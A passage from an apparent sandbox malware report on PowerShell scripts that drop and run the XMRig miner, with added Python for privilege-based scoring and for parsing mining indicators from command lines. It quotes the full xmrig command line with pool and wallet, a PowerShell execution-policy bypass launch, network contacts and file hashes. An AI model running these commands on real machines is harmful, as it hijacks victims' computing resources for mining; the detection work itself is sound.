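    trusted = path.startswith(TRUSTED_PREFIXES)
    if "SeLockMemoryPrivilege" in event.enabled and not trusted:
        # Large-page locking requested by a binary outside Windows/Program Files:
        # this is what xmrig does before allocating the RandomX dataset.
        return ("high", "SeLockMemoryPrivilege enabled by a binary outside trusted directories")
    if "SeDebugPrivilege" in event.enabled and path.endswith("\\powershell.exe"):
        # Common for admin tooling, so only medium on its own; it becomes
        # interesting together with the dropped-EXE and network signatures.
        return ("medium", "SeDebugPrivilege enabled by PowerShell")
    return None


def evaluate(events):
    """Score every record and collapse repeats, so the two identical xmrig calls yield one finding."""
    findings = {}
    for event in events:
        result = score(event)
        if result is not None:
            severity, reason = result
            findings.setdefault((event.process, reason), severity)
    return [(process, severity, reason) for (process, reason), severity in findings.items()]
```

Run against the records above this yields one medium finding for powershell.exe and one high finding for xmrig.exe; the svchost.exe row, a Windows service image enabling a right it legitimately needs, produces nothing, which is the behaviour to keep when porting the rule to a SIEM.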

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup
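
The two command lines above carry everything a responder needs from process-creation telemetry: a PowerShell launcher run with -ExecutionPolicy bypass against a script in the user's Temp folder, and the dropped xmrig.exe with its algorithm (-a rx), pool (-o stratum+ssl://rx.unmineable.com:443), unMineable user string (COIN:address.worker) and password (-p x) all on the command line. The script below is an added example written for this report; it is not part of the sandbox output or of XMRig. It tokenizes Windows command lines (keeping quoted paths whole), maps XMRig's -a/-o/-u/-p options and their --algo/--url/--user/--pass forms to a structured finding, splits the unMineable COIN:address.worker user field, checks the wallet against the Monero primary-address format, and flags the PowerShell bypass launcher. The sample list embeds the report's two command lines plus a constructed benign svchost line; the finding field names, the address regex and the rule that a scheme-less pool means plain stratum are assumptions of the example.

```python
"""Pull cryptomining IOCs out of Windows process-creation command lines.

Added example for this report; not part of the sandbox output or of XMRig.
The PowerShell and xmrig.exe lines in SAMPLE_CMDLINES are copied from the
Processes section; the svchost line, the finding field names and the
"scheme-less pool means plain stratum" rule are constructed for the example.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed sample: the report's two command lines plus one benign line.
SAMPLE_CMDLINES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r"-o stratum+ssl://rx.unmineable.com:443 "
    r"-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x",
    r"C:\Windows\System32\svchost.exe -k UnistackSvcGroup",
]

# XMRig option names (short and long) for the fields that identify a mining job.
XMRIG_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
              "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# Monero primary addresses: 95 base58 characters starting with '4' ('8' for subaddresses).
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace but keep double-quoted paths (with spaces) as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_pool(url: str) -> tuple[str, int | None, bool]:
    """Return (host, port, tls) for an XMRig -o value; a bare host:port is plain stratum."""
    if "://" not in url:
        url = "stratum+tcp://" + url  # assumption: no scheme means no TLS
    parts = urlsplit(url)
    tls = parts.scheme.endswith(("ssl", "tls"))
    return parts.hostname or "", parts.port, tls


def parse_xmrig(tokens: list[str]) -> dict:
    """Map '-o URL' / '--url=URL' style options to a structured miner finding."""
    opts: dict[str, str] = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if tok.startswith("--") and "=" in tok:
            name, _, value = tok.partition("=")
        elif tok.startswith("-") and i < len(tokens) and not tokens[i].startswith("-"):
            name, value = tok, tokens[i]
            i += 1
        else:
            continue  # boolean flag such as --tls, or a stray positional
        if name in XMRIG_OPTS:
            opts[XMRIG_OPTS[name]] = value
    host, port, tls = parse_pool(opts.get("url", ""))
    # unMineable packs "COIN:address.worker" into the user field; ordinary
    # pools take "address.worker" or just "address".
    user = opts.get("user", "")
    coin, _, rest = user.partition(":") if ":" in user else ("", "", user)
    wallet, _, worker = rest.partition(".")
    return {
        "type": "xmrig_miner", "image": tokens[0], "algo": opts.get("algo", ""),
        "pool_host": host, "pool_port": port, "tls": tls or "--tls" in tokens,
        "coin": coin, "wallet": wallet, "worker": worker,
        "monero_address": bool(MONERO_ADDR.match(wallet)),
    }


def parse_powershell(tokens: list[str]) -> dict | None:
    """Flag powershell.exe run with -ExecutionPolicy bypass -File <script>."""
    low = [t.lower() for t in tokens]
    # powershell.exe accepts abbreviated switches (-ex, -exec, -ep, -f).
    bypass = any((low[i].startswith("-ex") or low[i] == "-ep") and low[i + 1] == "bypass"
                 for i in range(len(low) - 1))
    script = next((tokens[i + 1] for i in range(len(tokens) - 1) if low[i] in ("-file", "-f")), "")
    if not (bypass and script):
        return None
    return {"type": "powershell_bypass_launcher", "script": script,
            "from_temp": "\\appdata\\local\\temp\\" in script.lower()}


def triage(cmdlines: list[str]) -> list[dict]:
    """Run both checks over a batch of command lines and return the findings."""
    findings = []
    for line in cmdlines:
        tokens = tokenize(line)
        if not tokens:
            continue
        image = tokens[0].rsplit("\\", 1)[-1].lower()
        if image == "powershell.exe":
            hit = parse_powershell(tokens)
            if hit:
                findings.append(hit)
        elif image == "xmrig.exe" or "stratum" in line.lower():
            findings.append(parse_xmrig(tokens))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding)
```

Run it as-is to print the two findings for this sample; in practice feed it the CommandLine field of Sysmon Event ID 1 or Security event 4688 (the latter only carries the command line when command-line auditing is enabled). The wallet address and worker name are the stable pivots: the pool host and the xmrig.exe path change between campaigns far more often than the payout address does.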

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 13.107.253.67:443 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 172.217.20.170:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 170.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 28.190.21.2.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 15.251.17.2.in-addr.arpa udp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/4284-0-0x00007FFFD6D23000-0x00007FFFD6D25000-memory.dmp

memory/4284-1-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zkc4rhx.yqf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4284-11-0x000001AEDA8B0000-0x000001AEDA8D2000-memory.dmp

memory/4284-12-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/4284-14-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/4284-15-0x000001AEF2CD0000-0x000001AEF2CE2000-memory.dmp

memory/4284-16-0x000001AEF2C90000-0x000001AEF2C9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1976-47-0x000002427C700000-0x000002427C720000-memory.dmp

memory/4284-48-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/1976-49-0x000002427C950000-0x000002427C970000-memory.dmp

memory/4284-50-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/1976-51-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-52-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-53-0x000002427E150000-0x000002427E170000-memory.dmp

memory/1976-54-0x000002427C970000-0x000002427C990000-memory.dmp

memory/1976-55-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-56-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-58-0x000002427C970000-0x000002427C990000-memory.dmp

memory/1976-57-0x000002427E150000-0x000002427E170000-memory.dmp

memory/1976-59-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp through memory/1976-117-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp (59 dumps, indices 59 to 117, all of the same 0x00007FF6B7C50000-0x00007FF6B8883000 region of process 1976)

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: the rule matched 64 times, with no description, indicator, process or target recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4728-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taxvil21.1jk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4728-9-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-10-0x00000255AA980000-0x00000255AA9A2000-memory.dmp

memory/4728-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-14-0x00000255AAA20000-0x00000255AAA32000-memory.dmp

memory/4728-15-0x00000255AA970000-0x00000255AA97A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4040-46-0x00000163AB460000-0x00000163AB480000-memory.dmp

memory/4040-47-0x00000163ACC60000-0x00000163ACC80000-memory.dmp

memory/4040-48-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-51-0x00000163ACCA0000-0x00000163ACCC0000-memory.dmp

memory/4040-50-0x00000163ACC80000-0x00000163ACCA0000-memory.dmp

memory/4040-49-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4728-52-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-53-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

memory/4728-54-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4040-55-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-56-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-58-0x00000163ACCA0000-0x00000163ACCC0000-memory.dmp

memory/4040-57-0x00000163ACC80000-0x00000163ACCA0000-memory.dmp

memory/4040-59-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp through memory/4040-117-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp (59 dumps, indices 59 to 117, all of the same 0x00007FF6A1300000-0x00007FF6A1F33000 region of process 4040)

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:57

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: the rule matched 64 times, with no description, indicator, process or target recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 52.111.229.48:443 tcp

Files

memory/4876-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaudbyki.qyg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-9-0x0000024EEB110000-0x0000024EEB132000-memory.dmp

memory/4876-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-15-0x0000024EEB190000-0x0000024EEB19A000-memory.dmp

memory/4876-14-0x0000024EEB5F0000-0x0000024EEB602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-46-0x000001B20EEA0000-0x000001B20EEC0000-memory.dmp

memory/2576-47-0x000001B2A2E50000-0x000001B2A2E70000-memory.dmp

memory/2576-48-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/4876-49-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/2576-52-0x000001B2A34D0000-0x000001B2A34F0000-memory.dmp

memory/2576-51-0x000001B2A32A0000-0x000001B2A32C0000-memory.dmp

memory/4876-50-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/2576-53-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-54-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-55-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-57-0x000001B2A34D0000-0x000001B2A34F0000-memory.dmp

memory/2576-56-0x000001B2A32A0000-0x000001B2A32C0000-memory.dmp

memory/2576-58-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp through memory/2576-116-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp (59 dumps, indices 58 to 116, all of the same 0x00007FF669EC0000-0x00007FF66AAF3000 region of process 2576)

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:46

Platform

win11-20240426-en

Max time kernel

1788s

Max time network

1753s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: the rule matched 64 times, with no description, indicator, process or target recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/5084-0-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vilkwpnv.gxi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5084-9-0x00000174D7C10000-0x00000174D7C32000-memory.dmp

memory/5084-10-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-11-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-12-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-14-0x00000174F0130000-0x00000174F0142000-memory.dmp

memory/5084-15-0x00000174F0110000-0x00000174F011A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
